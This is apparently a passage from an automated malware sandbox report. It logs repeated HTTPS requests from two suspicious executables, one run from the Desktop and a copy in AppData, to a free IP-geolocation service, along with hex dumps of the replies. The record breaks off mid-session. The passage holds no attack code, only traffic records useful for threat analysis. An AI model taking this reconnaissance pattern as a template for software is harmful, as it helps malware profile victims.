                                            2024-07-24 13:08:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.749705188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:21 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:21 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:21 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1252
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlH%2FYs9Ocfh7omlyFKd4kBD6yrJtHMslFx%2BjimhkqGGha5ARneibYypITHjxWEPq342K8ewddQXn5JYhNKkXRQfq7%2FKAxsRDPgy9LSJKQR0INhmBvGaKCQ4gbz3sOwrY8lrun4xk"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423717e908cc8-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.749707188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:23 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:23 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1254
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6eFPl4YU1a%2B%2BX6XsN75%2Fi70fNsiD5LaxpZBjpyIHvzxby1bZEmZ1qhXZPySKTuuJKmguCzk9kP30oREgAqkcggXywApqWiUoku8Nqwxq8qp6Uaja0AjtVKyFIsa6yT7IGDxJnET"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84237bfe43431b-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.749712188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:24 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:24 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1255
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FJcNAGOLvyHohm5rZSKmUl3NrJprWvzSSTeqIcBpojbGz0zB%2Bl2WtkMSSOJ4aIcML8zBDOTom2lXdBiAmCtD1fz2FmcdMAgTaCuIULelhQa%2B4zxc26QjpkiG1H09ZlKfuW7OxQc"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a842383ae24435c-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.749713188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:24 UTC703INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:24 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1255
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQOqBGIluD%2B7e4EGOp2bumbMD7Yx5yozfao6zi1hLO8oHCLqyLbynkQ5Poz3sZ8VfG7CmJ01CG194PrITnTDeLeIi%2BKoimMJZLNfot68VV3XbytoJWRbxn6ix1LuUuvH7YQTYeAB"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a842385e9ed8cd6-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.749715188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:25 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:25 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1256
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqZdy%2Bmr3W0R1k9UoGCH1Fq3Sbon4NLwKxLk0jPg4pun8Ogny%2BiQoCmtM4QgaRgvhvlGNxZMNR00wQmcTkV5SEWIarvFtXKBODIO4GxyWTwiAJHlp7PfewAQGSi350l10k7g%2F8H7"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84238c9a4d17f5-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.749716188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:25 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:25 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1256
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzI%2Bl7J7AVVyXFrs%2Fybew9q3ZweLwMhsWiMfLIHGWDAOvDMdhtrizYPfHX8r0Buc2OOqaPf9KQEdz3VDMPF3vVc5bYjdGORwfHyzXTuEDzFAPvjF%2Bv3zdRxIv9Y7awCLNjUsPaKD"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84238cec428c83-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.749719188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:27 UTC709INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:27 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1258
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9z2ySrYvc1l7CRF9MCfMsYovuNIDzE6n3drMKY94ustcBS62bKsfhYYimeSJ0lrZBn97A8XZujXq%2Ba9iS%2Fs0jDIasy3s07O%2BmGu8b1t%2B0KgZPEsUzdoAiNN58BwrOtwU%2FdiGcqB"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a842396e8714414-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.749720188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            Connection: Keep-Alive
                                            2024-07-24 13:08:27 UTC711INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:27 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1258
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ddpFdnKspsi93VtmwDzqQpDynmlh7xwpMXc%2F0Pb43Fx%2B6JDg0ZOJPxKI36jxb%2FH0qpFt%2Bu7fxCHHvZHiTrNeLKCURoKDUTAHcyVf5IOoOynxjQoh7SyRr4fkPy%2FS4eTIsHD%2BUlSN"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8423972cd2727a-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.749723188.114.97.34432916C:\Users\user\Desktop\rPO0977-6745.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:28 UTC713INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:28 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1259
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8be3Du37cX%2FuMHCxzmbv6hGK3LEDy1jccK3orHMeskdKL8eTTZNBA7Is2eQ4PA%2FA4vZTsRo91q%2By8k1jFWj5P%2BhGaKerFYbKD21%2FbALY%2FcztGt9GEgeXzgs2bOA7%2FF7mnuethTM"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a84239edbd543a3-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-24 13:08:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-24 13:08:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.749724188.114.97.34438004C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-24 13:08:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                            Host: reallyfreegeoip.org
                                            2024-07-24 13:08:28 UTC705INHTTP/1.1 200 OK
                                            Date: Wed, 24 Jul 2024 13:08:28 GMT
                                            Content-Type: application/xml
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            access-control-allow-origin: *
                                            vary: Accept-Encoding
                                            Cache-Control: max-age=86400
                                            CF-Cache-Status: HIT
                                            Age: 1259
                                            Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9zJ%2FnjQ2i3oe0TIBknQT1qfxrtE46xfTVYl3WwfLfTf%2BGDXy6lF4tt1NjIbQhrZw74K6ZxiIWlfDw14Vod2QVTM05I7w1M8AoYiat58a2G9Rp4upGfSAGcZ%2Bk2NVjUWo9MIFzgoq"}],"group":"cf-nel","max_age":604800}
